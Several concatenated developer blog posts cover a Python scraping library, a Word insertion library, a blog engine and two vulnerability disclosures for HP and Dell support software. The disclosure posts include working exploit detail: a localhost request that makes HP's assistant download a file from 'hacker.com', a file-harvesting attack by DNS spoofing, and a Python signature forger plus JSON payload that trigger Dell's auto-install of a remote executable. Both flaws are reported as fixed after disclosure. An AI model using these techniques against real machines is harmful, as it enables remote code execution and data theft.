Scraping websites with Cyborg

I often find myself creating one-off scripts to scrape data off websites for various reasons. My go-to approach for this is to hack something together with Requests and BeautifulSoup, but this was getting tiring. Enter Cyborg, my library that makes writing web scrapers quick and easy.

Cyborg is an asyncio-based pipeline orientated scraping framework - in English that means you create a couple of functions to scrape individual parts of a site and throw them together in a sequence, with each of those parts running asynchronously and in parallel. Imagine you had a site with a list of users and you wanted to get the age and profile picture of each of them. Here's how this is done in Cyborg, showing off some of the cool features:

from cyborg import Job, scraper
from aiopipes.filters import unique
import sys

@scraper("http://somesite.com/list_of_users")
def scrape_user_list(data, response, output):
   for user in response.find("#list_of_users > li"):
       yield from output({
           "username": user.get(".username").text
       })

@scraper("http://somesite.com/user/{username}")
def scrape_user(data, response):
   data['age'] = response.get(".age").text
   data['profile_pic'] = response.get(".pic").attr["href"]
   return data

if __name__ == "__main__":
   pipeline = Job("UserScraper") | scrape_user_list | unique('username') | scrape_user.parallel(5)
   pipeline > sys.stdout
   pipeline.monitor() > sys.stdout
   pipeline.run_until_complete()

That's it! The idea behind Cyborg is to keep the focus on the actual scraping while getting things that are usually hard, like parallel tasks, error handling and monitoring, for free.

The library is very much in alpha, but you can find the project here on GitHub. Feedback welcome!

Our pipeline

Our pipeline is defined like so:

pipeline = Job("UserScraper") | scrape_user_list | unique('username') | scrape_user.parallel(5)
pipeline > sys.stdout

The Job() class is the start of our pipeline and it holds information like the name of the task ('UserScraper'). We use the | operator to add tasks to the pipeline, the first one being scrape_user_list. Any output from that task is passed to unique, which as you may have guessed filters out duplicate usernames that may be produced. This then passes output to the scrape_user function, and the .parallel(5) means start 5 parallel workers to process usernames.
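To make the role of unique a bit more concrete, here is a minimal synchronous sketch of a key-based duplicate filter. It is not how aiopipes implements it (that version is asyncio-based); the function name unique_by and the sample data are made up for illustration.

```python
def unique_by(key, items):
    """Yield each dict from `items` the first time its `key` value is seen."""
    seen = set()
    for item in items:
        value = item[key]
        if value in seen:
            continue  # duplicate: drop it
        seen.add(value)
        yield item


# Hypothetical sample data standing in for scrape_user_list's output.
users = [{"username": "alice"}, {"username": "bob"}, {"username": "alice"}]
deduplicated = list(unique_by("username", users))
print(deduplicated)
```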

The > operator is used to pipe the output of the pipeline to the standard output, but this could be any file-like object or function instead. This means you could write an import_into_database function that takes some scraped data and uses SQL to add it to a database.
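As a rough sketch of what such an import_into_database function might look like, the example below uses the standard library's sqlite3 module. The table layout and the in-memory database are assumptions, and it assumes the function is called once per scraped dictionary.

```python
import sqlite3

# Hypothetical database: in-memory here, a file path in practice.
connection = sqlite3.connect(":memory:")
connection.execute(
    "CREATE TABLE users (username TEXT PRIMARY KEY, age TEXT, profile_pic TEXT)"
)


def import_into_database(data):
    """Store one scraped user dictionary as a row in the users table."""
    with connection:  # commits on success, rolls back on error
        connection.execute(
            "INSERT OR REPLACE INTO users (username, age, profile_pic) "
            "VALUES (:username, :age, :profile_pic)",
            data,
        )


import_into_database({"username": "test", "age": "30", "profile_pic": "/pics/test.png"})
rows = connection.execute("SELECT username, age, profile_pic FROM users").fetchall()
print(rows)
```

Under that assumption, it would be attached with pipeline > import_into_database in place of sys.stdout.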

A key aim of Cyborg is to make monitoring the pipeline simple. The pipeline.monitor() > sys.stdout handles this for us by piping status information every second to the standard output. Below is some sample output from a real version of our pipeline (one that handles pagination and does a bit more work). You can see a progress bar for each task, including the 5 scrape_user workers. Error totals are also displayed here, if there are any.

UserScraper: 3 pipes
Runtime: 9 seconds
 |-------- scrape_user_list
           Input: 14/26 read.  53% done
           [=========*          ]  14/26
           Tasks:
 |-------- unique 
           Input: 825/825 read. 100% done
           [===================*] 825/825
 |-------- scrape_user
           Input: 8/825 read.   0% done
           [*                   ]   8/825
           Tasks:
  |------- [*                   ]   3/66
  |------- [*                   ]   3/92
  |------- [===*                ]   5/22
  |------- [===============*    ]   8/10

Scrapers

A scraper is a function decorated with @scraper, with the first argument being the page URL that is to be scraped. The response to that URL is passed as a parameter to the function, and the function should parse it to extract relevant information.

The scrape_user_list function is fairly simple: it takes a static URL (/list_of_users) and runs a simple CSS query on it to find the HTML elements we are interested in. It then uses yield from output to pass a dictionary to the next phase of the pipeline. We need yield from here because our scraper could produce an arbitrary number of outputs, and it ensures that output is buffered until tasks further down the pipeline are ready to handle it.
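The buffering idea can be illustrated with a bounded asyncio.Queue. This is only a sketch of the general backpressure technique, not Cyborg's internals: it uses the newer async/await syntax rather than yield from, and the queue size and item counts are arbitrary.

```python
import asyncio


async def producer(queue, count, observed_sizes):
    for number in range(count):
        # put() suspends while the queue is full, so the producer can never
        # run more than `maxsize` items ahead of the consumer.
        await queue.put(number)
        observed_sizes.append(queue.qsize())
    await queue.put(None)  # sentinel: no more items


async def consumer(queue, results):
    while True:
        item = await queue.get()
        if item is None:
            break
        await asyncio.sleep(0)  # stand-in for slow downstream work
        results.append(item)


async def main():
    queue = asyncio.Queue(maxsize=2)
    results, observed_sizes = [], []
    await asyncio.gather(
        producer(queue, 5, observed_sizes), consumer(queue, results)
    )
    return results, observed_sizes


results, observed_sizes = asyncio.run(main())
print(results, max(observed_sizes))
```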

The dictionary produced by scrape_user_list is used to format the scrape_user URL. So if scrape_user_list produces {'username': 'test'} then scrape_user's URL will be resolved to /user/test. This is then fetched, the age and profile picture are extracted from the response, and the result is passed on. As this is the last function in the pipeline, its output is written to stdout in JSON format.
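The URL resolution step behaves much like Python's own str.format. The snippet below assumes that is roughly what happens under the hood; it is an illustration rather than Cyborg's actual code.

```python
url_template = "http://somesite.com/user/{username}"
data = {"username": "test"}

# str.format fills each {placeholder} from the matching dictionary key.
resolved_url = url_template.format(**data)
print(resolved_url)
```

Usernames containing characters such as spaces or slashes would need escaping first, for example with urllib.parse.quote.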

The library itself

The library is pretty new. I wrote a 'draft' version that I wasn't very happy with, and this is a rewrite much closer to what I had originally imagined. You can find the code on GitHub, or use pip install cyborg to install it locally.

HtmlToWord is now WordInserter

I've released a redesign of my HtmlToWord library. It now supports Markdown and multiple different ways to interact with Word, and it has been renamed to WordInserter to reflect this.

Originally HtmlToWord was designed to take HTML input, process it and then insert a representation of it into a Word document. I made this for a project at my work involving taking HTML input from a user (created using a WYSIWYG editor) and generating a Word document containing this. I was surprised to find no native way to do this in Word (other than emulating copy+paste, eww), so I made and released HtmlToWord. That library was tied directly to HTML: each supported tag was an individual class responsible for rendering itself.

This quickly got messy, and in a future version of the project for work Markdown was used instead, so I decided to re-write the library from scratch to handle this. HtmlToWord uses the HTML input to create a number of objects, one for each tag, and then calls a Render method on each of them. As WordInserter needs to process both HTML and Markdown I decided to better decouple the parsing from the rendering, otherwise the library would be full of duplicate code. It now takes some supported input and creates a tree of operations to perform which is then recursively fed to a specific renderer responsible for processing it.
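The decoupling described above can be sketched as a small tree of operations plus a renderer that walks it recursively. The class names here (Operation, Paragraph, Bold, Text, PlainTextRenderer) are hypothetical and are not WordInserter's own; a plain-text renderer stands in for the COM one so the example runs anywhere.

```python
class Operation:
    """A node in the tree; children are nested operations."""

    def __init__(self, *children):
        self.children = list(children)


class Paragraph(Operation):
    pass


class Bold(Operation):
    pass


class Text(Operation):
    def __init__(self, value):
        super().__init__()
        self.value = value


class PlainTextRenderer:
    """Walks the tree recursively; knows nothing about HTML or Markdown."""

    def render(self, operation):
        if isinstance(operation, Text):
            return operation.value
        inner = "".join(self.render(child) for child in operation.children)
        if isinstance(operation, Bold):
            return "*" + inner + "*"
        if isinstance(operation, Paragraph):
            return inner + "\n"
        return inner


# Either an HTML parser or a Markdown parser could produce this same tree.
tree = Paragraph(Text("This is "), Bold(Text("some")), Text(" text"))
output = PlainTextRenderer().render(tree)
print(output)
```

Supporting a new input format then only means writing a parser that emits the same operations, and supporting a new output only means writing another renderer.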

The result of this is the code is a lot cleaner and more maintainable, and it supports different ways to take the input and insert it into Word. Currently only COM is supported, but in the future if other projects that directly manipulate .docx files mature a bit I can create a renderer that works on Linux.

Using the library is super simple:

from wordinserter import render, parse
from comtypes.client import CreateObject

# This opens Microsoft Word and creates a new document.
word = CreateObject("Word.Application")
word.Visible = True # Don't set this to True in production!
document = word.Documents.Add()
from comtypes.gen import Word as constants

markdown = """
### This is a title

![I go below the image as a caption](http://placehold.it/150x150)

*This is **some** text* in a [paragraph](http://google.com)

  * Boo! I'm a **list**
"""

operations = parse(markdown, parser="markdown")
render(operations, document=document, constants=constants)

I have also created an automated test script that renders a bunch of HTML and Markdown documents in both Firefox and Word. This is used to make a comparison document to quickly find any regressions or issues. Judging by the number of installs from PyPI and the number of other contributors to the GitHub project, this library is useful to some people, and I hope that they take a look at the redesign.

Here is a snapshot of the top of the comparison page:

HP Support Solutions Framework Security Issue

After discovering the flaw in Dell's System Detect software I looked into other similar software for issues. This post details two issues I found with the HP Product Detection software and explores the protections HP put in place. I'm also going to explain how they could be easily bypassed to allow an attacker to force files to be downloaded and to read arbitrary data, registry keys and system information through the user's browser with little or no interaction.

Timeline:

HP were incredibly prompt at fixing the issue and responding to communications. They have addressed these problems in a new version (11.51.0049) and have issued a security notification, available here. An updated version can (and should) be downloaded from their support page.

  • 25/3/2015 - Contacted HP with a writeup and received an acknowledgement that it has been passed to the relevant software team
  • 10/4/2015 - Received notification that the vulnerability has been fixed

Summary

Many large hardware vendors offer tools to automatically detect the hardware configuration of users' machines and take them to the exact drivers that they require. Just like Dell, HP feature this software prominently on their support landing page.

Unfortunately just like Dell the HP software contains a number of functions that you wouldn't expect. When you click "Find Now" you are actually downloading the complete HP Support Solutions Framework which includes functionality to:

  • Read arbitrary files and registry keys
  • Collect system information
  • Summarize installed drivers and devices
  • Initiate the HP Download Assistant to download arbitrary files

The program also attempts to send any collected data back to HP servers and to stop anyone but HP support staff from accessing it, but as I will demonstrate these checks are easily bypassed. Due to the nature of the software, any of these functions can be invoked by any web page you visit without any notification. Combined with the fact that the program shows no visible sign of running and starts automatically with the machine, this makes it a very dangerous piece of software.

The juicy details

As previously stated the software installs a service on your computer and listens for HTTP requests on localhost:8092. The JavaScript in your browser then communicates with this service by making AJAX requests to that local port. Below shows the page fetching the version information of the installed software:

When a browser makes an HTTP request it adds some information to the headers about the page or context that initiated the request, in the Referer (yes, spelt like that) and Origin headers. Under usual circumstances these requests would be coming from the HP support site, so the Referer header might have a value of http://www8.hp.com/uk/en/drivers.html.

So let's get right into the code and see how these headers are used. After decompiling the software we find the following (abbreviated) function inside SolutionsFrameworkService.SsfWebserver:

private void GetContextCallback(IAsyncResult result)
{
   string uriString;
   if (request.QueryString.Get("callback") != null)
      uriString = request.Headers["Referer"] ?? "http://hp.com";
   else
     uriString = request.Headers["Origin"] ?? "http://hp.com";

   if (!new Uri(uriString).GetComponents(UriComponents.Host, UriFormat.Unescaped).EndsWith("hp.com"))
   {
     ... error
   }
   else
   {
     ... process request
   }
}

The line we need to focus on is this:

if (!new Uri(uriString).GetComponents(UriComponents.Host, UriFormat.Unescaped).EndsWith("hp.com"))

In English this translates to "if the hostname does not end with hp.com, reject the request", and it is the only way the program authenticates a valid request. On the face of it this might look like a perfectly valid way to ensure that an HTTP request came from a valid HP domain, however it is critically flawed. The check only tests whether the hostname ends with hp.com, so if a hacker were to register the domain nothp.com and make a request from there, it would pass. Apart from giving me déjà vu, it also gives me a foot in the door: any command I issue will be processed by the software. So let's see what commands can be processed.
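The flaw is easy to reproduce outside of .NET. The Python sketch below mirrors the suffix check and contrasts it with one possible stricter test that requires either hp.com itself or a dot before the suffix. The function names are made up, and the stricter version is not necessarily what HP shipped in their fix.

```python
from urllib.parse import urlparse


def ends_with_hp(referer):
    """Mirrors the decompiled logic: accept any host that ends with 'hp.com'."""
    host = urlparse(referer).hostname or ""
    return host.endswith("hp.com")


def is_hp_host(referer):
    """Accept only hp.com itself or a true subdomain of it."""
    host = urlparse(referer).hostname or ""
    return host == "hp.com" or host.endswith(".hp.com")


for url in ("http://www8.hp.com/uk/en/drivers.html", "http://nothp.com/page"):
    print(url, ends_with_hp(url), is_hp_host(url))
```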

Triggering a download

When the program processes a request it inspects the first two components of the requested path. The first is used to look up a controller, and the second component (if present) specifies the method. In the Chrome screenshot above it is making a request to the version controller, which has one default action that returns the software version. Looking through the source there are several interesting controllers, but we shall start with the HPDIA controller, which is used to drive the "HP Download and Install Assistant". The actual code is pretty convoluted and not particularly relevant, but what is interesting is what happens if we make a request to (some unimportant parameters omitted):

http://localhost:8092/hpdia/run?RemoteFile=https://hacker.com/messbox.exe&FileTitle=update.exe

Then this triggers the download assistant to start, which brings itself to the foreground and downloads the file:

I looked long and hard but the software doesn't automatically install anything without user interaction. However this doesn't render the attack useless, far from it. The attacker is able to control the displayed file title ("update.exe" in the screenshot) and can completely hide the real executable name by calling it "_.exe", which causes the download assistant to display "(.exe)" after it. One redeeming feature of this software is that it only accepts download requests for files that are served over HTTPS.

If an inexperienced user were to visit a malicious page that looked like a real HP site telling them to update their software, and the HP download manager popped up, I think many might press install, which would execute the attacker's malware and compromise their machine. For some advanced malware merely being downloaded could be enough.

Edit: Funnily enough I told my housemate about this and he said he had the HP download assistant pop up once while browsing a "dodgy torrent site". Perhaps this was already known?

Harvesting users' information

The software contains a large number of "harvesters" (named so in the code) which can be used to steal files from users' machines and read other system information like registry keys or driver details. This attack is a bit more complex and targeted than the one above, but could be even more dangerous if executed correctly.

When an HP support technician attempts to diagnose problems with a customer's computer they may need to read specific files on the user's computer, or access other possibly sensitive information. The normal and legitimate steps taken by the software when a technician wishes to read information from the user's machine are as follows (please excuse my terrible diagrams):

  1. The support technician issues a request to the program instructing it to run the "idfservice" controller
  2. This controller then makes an HTTP request to the host diagsgmdextpro.houston.hp.com, with the product line of the HP machine the user is using. This returns a list of files to harvest
  3. The program then reads the specified portions of the files and sends them back to diagsgmdextpro.houston.hp.com
  4. The support technician presumably accesses this information to diagnose any issues.

You can view an example of the server's response by visiting the following URL: http://diagsgmdextpro.houston.hp.com/ediags/solutions/harvestertemplate?productLine=KV, and below is a snippet of the result that instructs the software to read a registry key:

<TemplateFile>
   <FileName>Hewlett-Packard\\HPActiveSupport\\Version</FileName>
   <MatchType>regex</MatchType>
   <Matches>
      <MatchExpression i:nil="true"/>
      <Matches>
         <MatchData>
            <MatchExpression>
                ^HPSAVer: (\d{1,5}[.]\d{1,5}[.]\d{1,5}[.]\d{1,5}|[a-zA-z]+)$
            </MatchExpression>
            <Name>HPSAver</Name>
         </MatchData>
      </Matches>
      <Name i:nil="true"/>
   </Matches>
   <Source>registry</Source>
</TemplateFile>

This isn't actually a terrible system, because the system contacts an authoritative service to retrieve a list of files to download rather than accept this data from the client directly.

So how can an attacker exploit this? He or she needs to trick the application into connecting to their server instead of one hosted by HP. One possible way to do this is a DNS spoofing attack (like DNS cache poisoning) so that the domain diagsgmdextpro.houston.hp.com resolves to an IP address they control. Another is to man-in-the-middle the connection, as the software uses a plaintext HTTP request to send and receive data. Exactly how to do this is outside the scope of this post, but it is possible.

Once done, the attacker can make the request to the user's software and it will connect back to a machine that they control, which will instruct the software to read any file they choose. Thus the following happens:

  1. Attacker triggers the user's browser into making a crafted request to the idfservice controller
  2. Program resolves the diagsgmdextpro.houston.hp.com to an attacker controlled IP and makes a request for files to read. The attacker returns a list of files he or she wants to read
  3. The program collects these files and sends them back to the diagsgmdextpro address, simply giving the data to the attacker.

As you can see from the sample XML above for each bit of data we read there has to be some form of filter in the form of a regular expression. We can simply use the expression .* to match the entire file. In the screenshot below I have made a simple web application that serves a malicious page that instructs the software to read C:\secret.txt and the user's system information. The console window to the left shows that the program has dutifully sent the data to the attacker controlled server.
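To show the difference between a narrow expression and a catch-all one, the sketch below runs the expression from the sample template and then .* using Python's re module. The sample registry value and file contents are invented. Whether .* spans multiple lines depends on the regex options the software uses, which I have not confirmed, so both behaviours are shown.

```python
import re

# Expression taken from the sample template above.
template_expression = r"^HPSAVer: (\d{1,5}[.]\d{1,5}[.]\d{1,5}[.]\d{1,5}|[a-zA-z]+)$"
registry_value = "HPSAVer: 8.5.37.19"  # made-up sample value
version = re.match(template_expression, registry_value).group(1)

file_contents = "first line\nsecond line"  # made-up sample file
# Without DOTALL, "." stops at a newline, so only the first line is captured.
first_line = re.match(r".*", file_contents).group(0)
# With DOTALL, "." also matches newlines and the whole content is captured.
whole_file = re.match(r".*", file_contents, re.DOTALL).group(0)

print(version, repr(first_line), repr(whole_file))
```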

Conclusion

I've described two flaws with the HP Solutions Framework that can be exploited to potentially compromise a user's machine with little or no user interaction. While the first attack is not as bad as Dell's (which requires no user interaction at all) it could be just as dangerous to nontechnical users who might not consider a random HP download window popping up to be suspicious.

The second attack is more targeted than the first and requires more setup, but could be used to read sensitive user documents or information and pass it back to the attacker. This should be mitigated first by using HTTPS and second by explicitly verifying the server's SSL certificate to ensure it is connecting to a valid HP controlled server.
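For illustration, here is roughly what that mitigation looks like in Python (the HP software itself is .NET, so this is only an analogue). The fetch_template helper is hypothetical and is not called here because it needs network access.

```python
import http.client
import ssl

# create_default_context() loads the system's trusted CA certificates and
# enables both certificate verification and hostname checking.
context = ssl.create_default_context()
print(context.verify_mode == ssl.CERT_REQUIRED, context.check_hostname)


def fetch_template(host, path):
    """Fetch `path` from `host` over HTTPS, failing if the certificate is invalid."""
    connection = http.client.HTTPSConnection(host, context=context, timeout=10)
    try:
        connection.request("GET", path)
        return connection.getresponse().read()
    finally:
        connection.close()
```

With verification enabled, a spoofed DNS entry or a man-in-the-middle would cause the TLS handshake to fail rather than silently handing data to the attacker, provided they cannot obtain a valid certificate for the hostname.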

While I don't want to be too critical of HP because their response was prompt and speedy I do think that their security procedures are lacking if such software can be published by them. That being said they do make it clear to users that they are downloading the entire Support Solutions Framework and explain the functionality it includes.

Dell System Detect RCE vulnerability

I recently discovered a serious flaw with Dell System Detect that allowed an attacker to trigger the program to download and execute an arbitrary file without any user interaction. Below is a summary of the issue and the steps taken to bypass the protections Dell put in place.

Timeline:

The issue was fixed within two months and Dell were clear in their communications throughout.

  • 11/11/2014 - Contacted Dell about the issue and received an acknowledgement
  • 14/11/2014 - Received confirmation that Dell's Internal Assessment team is investigating
  • 9/1/2015 - Dell state that they have fixed the issue by introducing additional validation and obfuscation
  • 10/1/2015 - Checked patched program and could not reproduce this exploit
  • 23/3/2015 - This post is published

Summary

Anyone who has owned a Dell will be familiar with the Dell Support page. You can get all the latest drivers for your exact machine configuration from this site by entering your Dell Service Tag, which can be found on a sticker somewhere on your machine or through clicking the shiny blue "Detect Product" button.

Clicking this button prompts you to download and install the "Dell System Detect" program, which is used to auto fill the service tag input and show you the relevant drivers for your machine.

While investigating this rather innocuous looking program I discovered that it accepts commands by listening for HTTP requests on localhost:8884 and that the security restrictions Dell put in place are easily bypassed, meaning an attacker could trigger the program to download and install any arbitrary executable from a remote location with no user interaction at all.

The interesting bit

If you click the button you are prompted to download and install the "Dell System Detect" program which conspicuously sits in your taskbar and starts itself with your machine. So this program is clearly part of the process of autodetecting the service tag, but how does the browser page communicate with it? You can use Chrome's excellent developer tools to view the network traffic of the page and see that it makes several requests to a service listening on localhost port 8884:

Ok, so it seems that Dell System Detect runs an HTTP server that listens for requests, which are sent from the Dell Support page's JavaScript. So let's take a closer look at the program: it's a .NET 2.0 executable and can be completely decompiled with dotPeek into a set of Visual Studio solutions. A quick search through the code for "http" brings us to eSupport.Common.Client.Service.RequestHandlers.ProcessRequest, which is responsible for processing a request received through the process's HTTP port. Below is an abbreviated snippet showing how this function authenticates that requests come from a valid Dell domain:

public void ProcessRequest(HttpListenerContext context)
{
    String url = "";
    if (context.Request.UrlReferrer == null) url = context.Request.Headers["Origin"];
    else url = context.Request.UrlReferrer.AbsoluteUri;

    if (url.Contains("dell"))
    {
        if (context.Request.HttpMethod == "GET")
          this.HandleGet(context);
        else if (context.Request.HttpMethod == "POST")
          this.HandlePost(context);
        ...
    }
}

So that's our first issue: the program attempts to verify that the request is sent from a Dell domain by only checking if "dell" appears in either the HTTP Referer or Origin header. Why is this a problem? The Referer header can contain the full URL of the requesting page, including the host and path. This means an attacker could easily make a request from a page at "http://hacker.com/dell" and it would pass the initial test, as "dell" is in the string.
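A quick Python sketch shows why a substring test is not enough, alongside one possible stricter check that looks only at the hostname. The function names are invented, and the stricter version is just an illustration, not Dell's actual fix.

```python
from urllib.parse import urlparse


def contains_dell(referer):
    """Mirrors the decompiled logic: accept if 'dell' appears anywhere in the URL."""
    return "dell" in referer


def is_dell_host(referer):
    """Accept only dell.com itself or a true subdomain, ignoring path and query."""
    host = urlparse(referer).hostname or ""
    return host == "dell.com" or host.endswith(".dell.com")


attacker_referer = "http://hacker.com/dell"
print(contains_dell(attacker_referer), is_dell_host(attacker_referer))
```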

Armed with this information we can make requests to the program that are at least partially processed. Inside each of the method handlers (HandleGet, HandlePost) there is a fair bit of messy code, but below is a simplified version:

private void HandleGet(HttpListenerContext context)
{
  string[] urlParts = context.Request.Url.AbsolutePath.Split('/');
  MethodInfo method = FindService(urlParts[0], urlParts[1]);

  string signature = context.Request.QueryString["signature"];
  string str3 = context.Request.QueryString["expires"];
  bool verified = new AuthenticationHandler().Authenticate(urlParts[0], urlParts[1], str3, signature);
  if (!verified) return Error();

  var result = method.Invoke(GetParameters(context.Request));
  return MakeResponse(result);
}

This function splits the request URL by the slash and uses the first two components to find the correct service to execute. In the Chrome screenshot above we see that the web page is making a request to clientservice/isalive, which means the program will execute the isalive method in the clientservice service.
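The same routing idea, sketched in Python with a hypothetical lookup table (the real program resolves its handlers through .NET reflection, and the is_alive handler here is a placeholder):

```python
def is_alive():
    return "alive"  # placeholder handler


# Hypothetical registry keyed by (service, method).
SERVICES = {("clientservice", "isalive"): is_alive}


def dispatch(path):
    """Resolve '/service/method' to a handler and call it."""
    # strip("/") avoids the empty first element that "/a/b".split("/") gives.
    parts = path.strip("/").split("/")
    if len(parts) < 2:
        raise LookupError("expected /service/method")
    handler = SERVICES.get((parts[0].lower(), parts[1].lower()))
    if handler is None:
        raise LookupError("unknown service or method")
    return handler()


print(dispatch("/clientservice/isalive"))
```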

After the service has been found it inspects two query string parameters, signature and expires, and passes them to the Authenticate method. If this passes then the service is invoked with other query string parameters as arguments.

It seems obvious by now that the program does a little bit more than simply retrieve your service tag, so before we look into the Authenticate method let's see what interesting things we can do.

Services

There are three services that can be used: diagnosticservice, downloadservice and clientservice. Within these are 25 methods, including getservicetag, getdevices, getsysteminfo, checkadminrights and downloadfiles. It seems that the entire Dell system support package is included with System Detect, meaning if we can bypass the authentication then we can trigger any of these methods.

The most interesting method is called downloadandautoinstall, which does exactly what it says on the tin.

[ServiceName("downloadservice")]
public class DownloadServiceLogic
{
    [RemoteMethodName("downloadandautoinstall")]
    public static ServiceResponse DownloadAndAutoInstall(string files)
    {
        // Download and execute URL's passed in the files parameter without prompting the user
    }
}

If we can bypass the Authenticate method then we can trigger this function, which will download and execute whatever file we tell it to, by making a request to http://localhost:8884/downloadservice/downloadandautoinstall. So let's take a look at the Authenticate method, which is the only thing stopping us:

public bool Authenticate(string service, string method, string expiration, string signature)
{
    var secret = string.Format("{0}_{1}_{2}_{3}", service, method, expiration, "37d42206-2f68-48be-a09a-9f9b6424ad85");
    var hash = new SHA256Managed().ComputeHash(Encoding.UTF8.GetBytes(secret));

    string stringToEscape = Convert.ToBase64String(hash).TrimEnd('=');
    bool flag = stringToEscape.ToLower() == signature.ToLower() || Uri.EscapeDataString(stringToEscape).ToLower() == signature.ToLower();
    if (!flag)
        ErrorLog.WriteLog("Not authenticated");
    return flag;
}

Wow. Ok, so not exactly the hardest thing to break. The service, method, expiration and signature arguments are all attacker controlled and passed through GET arguments. The only thing not controlled by a remote attacker is the hard-coded GUID "37d42206-2f68-48be-a09a-9f9b6424ad85".

Essentially all the function does is build a string from the arguments and the GUID, hash it, and compare the result with the signature the user has supplied; if they match, the user is 'authenticated'. With this information in hand we can create a simple Python function to generate a valid signature:

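import base64
import hashlib
import time

def make_signature(service, method):
    # Expiry timestamp 400000 seconds (about 4.6 days) in the future
    expiration = int(time.time()) + 400000

    # Same layout as the string built by Authenticate: service_method_expiration_GUID
    secret_string = "{}_{}_{}_{}".format(
        service, method, expiration, "37d42206-2f68-48be-a09a-9f9b6424ad85"
    )

    hashed = hashlib.sha256(secret_string.encode("utf-8"))
    print("Secret: {}".format(secret_string))
    print("Hash: {}".format(hashed.hexdigest()))
    # Base64-encode the raw digest and strip the padding, as TrimEnd('=') does
    return expiration, base64.b64encode(hashed.digest()).rstrip(b"=")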

If we can generate a valid token then we can trigger the "downloadandautoinstall" method with our arbitrary file by causing the user to make a GET request, which is very easy to do. A simple way would be to embed an image in a web page with the source set to "http://localhost:8884/downloadservice/downloadandautoinstall" with the appropriate GET arguments. After some investigation it seems that the DownloadAndAutoInstall method needs a list of JSON strings containing information about files to download and install. Sending an object like the following (written here as a Python dictionary, to be serialised to JSON) with a valid signature will trigger a download:

{
    "Name": "messbox.exe",
    "InstallOrder": 1,
    "IsDownload": True,
    "IsAutoInstall": True,
    "Location": r"http://www.greyhathacker.net/tools/messbox.exe"
 }

Conclusion

So in conclusion we can make anyone running this software download and install an arbitrary file by triggering their web browser to make a request to a crafted localhost URL. This can be achieved a number of ways, and the service will faithfully download and execute our payload without prompting the user.

I don't think Dell should be including all this functionality in such a simple tool and should have ensured adequate protection against malicious inputs. After contacting Dell and discussing the issue with their internal security team they pushed out a fix that included obfuscating the downloaded binary. While I cannot be sure I think they simply changed the conditional from "if dell in referrer" to "if dell in referrer domain name", which may be slightly harder to exploit but just as severe. There is now also a big agreement you have to accept before downloading that specifies what the software can do.

Simple 2

I've just about finished the next version of Simple, the markdown based blog that powers this site.

When I first made Simple it was because I disliked WordPress, which seemed a bit too bloated. Then I saw Svbtle and I really liked the minimalist design (mostly the posting interface) and decided to make a clone in Python.

This worked great and powered my blog for three years or so without any issues, but I became a bit tired of the minimal white design and wanted something with a bit more to look at. When I stumbled across the HPSTR Jekyll Theme I really liked the layout and design and decided to adapt that for the next version of Simple.

And so here it is. It tries to stay true to its name by being simple to use and install whilst still having a decent feature set and a nice design. The editing interface is a styled textarea that grows as you type, and adding an image is as simple as dragging and dropping it onto the page. This will upload the image and insert the right markdown at your cursor position. You can also edit the title by just selecting it and typing.

One thing I really liked about the HPSTR theme is the large image header, and I decided to combine this with the Bing daily image. When writing a post you can view the last 25 daily images by clicking the picture icon in the top right and using the left and right arrows to navigate:

I've tried to make installing Simple as painless as possible. You create a virtual environment for Simple, install the package and then use the 'simple' command to create a blog. Creating and maintaining config files is a pain, so you can use the simple command to create nginx and supervisord config files with the right file paths included (you will likely need to run apt-get install nginx or yum install nginx, and install supervisor to use them).

>> mkdir blog && cd blog
>> python3.4 -m venv env
>> source env/bin/activate && pip install simpleblogging gunicorn
>> simple create
>> nano simple_settings.py
>> simple nginx_config yoursite.com --proxy_port=9009 > /etc/nginx/conf.d/simple.conf
>> simple supervisor_config env/ 9009 >> /etc/supervisord.conf
>> chown -R nobody:nobody ../blog
>> supervisorctl start simple && service nginx reload

And that's all you need.